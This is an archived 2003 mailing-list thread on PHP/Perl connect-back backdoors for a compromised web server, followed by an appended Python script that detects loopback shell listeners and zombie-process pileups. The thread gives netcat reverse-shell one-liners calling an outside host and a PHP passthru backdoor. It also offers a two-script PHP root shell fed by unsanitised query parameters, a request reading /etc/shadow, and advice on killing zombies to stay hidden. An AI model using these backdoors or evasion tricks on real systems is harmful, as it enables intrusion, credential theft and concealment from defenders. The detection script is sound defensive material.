Re: perl/php connect-back backdoor?

From: Diode Trnasistor (ffddfeat_private)
Date: Wed Jul 30 2003 - 03:28:41 PDT

    Hi,
    
    I've been using this technique for a while.  If you
    can upload a PHP or a Perl file which gets executed in
    the server context, you have already won, regardless of
    firewall rules.  The obvious method is the connect
    back (i.e. nc -e /bin/sh x.x.x.x 80, as that's the
    likely allowed outbound port).  If that's a no go,
    and there's absolutely no way to establish a
    session, you still win.  
    
    Consider this:
    <?
       `exploit which gets root and calls nc -e /bin/sh -l
    -p 9999`
    ?>
    
    then another script:
    <?
       // $x arrives as the query-string parameter x (register_globals
       // in the original; $_GET makes it explicit).  The command is
       // piped to the listener the first script bound on localhost:9999.
       $x = $_GET['x'];
       $z = `echo $x | nc localhost 9999`;
       $z = str_replace("\n", "<br>", $z);
       echo $z;
    ?>
    
    As is obvious, call the second script and you have
    somewhat of a crippled root shell.
    
    www.target.com/script2.php?x=cat /etc/shadow
    
    you get the point :P
    
    PS: the silly thing about this is that each command
    you execute this way ends up as a zombie process.
    In a few minutes of working with this "shell" you'll
    have hundreds of zombie processes on the target
    machine.  What I like to do is run zkill (zkill.c,
    google it) slightly modified to terminate all zombies.
    This way it's less obvious that something very odd is
    going on.
    
    --- Knud_Erik_Højgaard <kainat_private> wrote:
    > Ingram wrote:
    > [snip]
    > > i got right now is uid www. I think a
    > connect-back perl/php code
    > > could make it through this packet filter, as the
    > outbound rules could
    > > be less tight. 
    > > 
    > > Anyone aware of a backdoor like this?
    > netcat:
    > <? passthru("nc -e /bin/sh ip port"); ?>
    > 
    > or a cronjob doing the same.. 
    > 
    > --
    > kokanin
    
    
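The two host-side traces the post describes, a shell listener bound only to localhost and a pile-up of zombie processes, are exactly what a defender would hunt for. The Python below is an added example, not code from the post or from anyone in the thread: it parses constructed `ss -lntp` and `ps -eo pid,ppid,user,stat,comm` output embedded inline and flags (a) loopback listeners whose owning process is netcat-like or a shell and (b) parents with an unusual number of zombie children. The pids, process names and the placement of the zombie `sh` children under the `nc` listener in the sample are assumptions made for the sample, not observations from a real host.

```python
import re
from collections import Counter

# Constructed sample of `ss -lntp` output (not captured from a real host).
SS_SAMPLE = """State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*         users:(("sshd",pid=700,fd=3))
LISTEN 0      4096   127.0.0.1:631       0.0.0.0:*         users:(("cupsd",pid=812,fd=7))
LISTEN 0      1      127.0.0.1:9999      0.0.0.0:*         users:(("nc",pid=4242,fd=3))
LISTEN 0      511    *:80                *:*               users:(("apache2",pid=1200,fd=4))
"""

# Constructed sample of `ps -eo pid,ppid,user,stat,comm`.  Placing the
# zombie sh children under the nc listener is an assumption of the sample.
PS_SAMPLE = """  PID  PPID USER     STAT COMMAND
    1     0 root     Ss   systemd
  700     1 root     Ss   sshd
  812     1 root     Ss   cupsd
 1200     1 root     Ss   apache2
 1301  1200 www-data S    apache2
 4242     1 root     S    nc
 4310  4242 root     Z    sh
 4311  4242 root     Z    sh
 4312  4242 root     Z    sh
 4313  4242 root     Z    sh
 4314  4242 root     Z    sh
 4315  4242 root     Z    sh
 5000   812 lp       Z    cups-browsed
"""

# Process names that have no business owning a loopback listener on a web host.
SUSPECT_LISTENERS = {"nc", "netcat", "ncat", "socat", "sh", "bash", "dash",
                     "perl", "php", "python", "python3"}

_USERS_RE = re.compile(r'users:\(\("([^"]+)",pid=(\d+),fd=\d+\)')


def parse_ss(text):
    """Return one dict per LISTEN row: local address, port, owning comm and pid."""
    rows = []
    for line in text.splitlines()[1:]:          # skip the header line
        parts = line.split()
        if len(parts) < 5 or parts[0] != "LISTEN":
            continue
        addr, _, port = parts[3].rpartition(":")
        m = _USERS_RE.search(line)
        comm, pid = (m.group(1), int(m.group(2))) if m else ("?", None)
        rows.append({"addr": addr, "port": int(port), "comm": comm, "pid": pid})
    return rows


def parse_ps(text):
    """Return {pid: {ppid, user, stat, comm}} from ps -eo pid,ppid,user,stat,comm."""
    procs = {}
    for line in text.splitlines()[1:]:          # skip the header line
        parts = line.split(None, 4)
        if len(parts) < 5:
            continue
        pid, ppid, user, stat, comm = parts
        procs[int(pid)] = {"ppid": int(ppid), "user": user, "stat": stat, "comm": comm}
    return procs


def _is_loopback(addr):
    return addr.startswith("127.") or addr in ("::1", "[::1]")


def loopback_shell_listeners(ss_rows, procs):
    """Loopback-only listeners owned by netcat-like or shell processes."""
    findings = []
    for r in ss_rows:
        if _is_loopback(r["addr"]) and r["comm"] in SUSPECT_LISTENERS:
            owner = procs.get(r["pid"], {}).get("user", "?")
            findings.append({"port": r["port"], "comm": r["comm"],
                             "pid": r["pid"], "user": owner})
    return findings


def zombie_parents(procs, threshold=10):
    """Parents holding at least `threshold` zombie (STAT Z) children."""
    counts = Counter(p["ppid"] for p in procs.values() if p["stat"].startswith("Z"))
    return {ppid: n for ppid, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    procs = parse_ps(PS_SAMPLE)
    for f in loopback_shell_listeners(parse_ss(SS_SAMPLE), procs):
        print("loopback listener: port %(port)d %(comm)s pid %(pid)d user %(user)s" % f)
    for ppid, n in zombie_parents(procs, threshold=5).items():
        print("pid %d (%s) has %d zombie children" % (ppid, procs[ppid]["comm"], n))
```

On a live host feed the real `ss -lntp` and `ps -eo pid,ppid,user,stat,comm` output into the two parsers; the threshold is deliberately a parameter because a handful of zombies is normal noise while the post's "hundreds" under one parent is not.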



    This archive was generated by hypermail 2b30 : Wed Jul 30 2003 - 12:28:38 PDT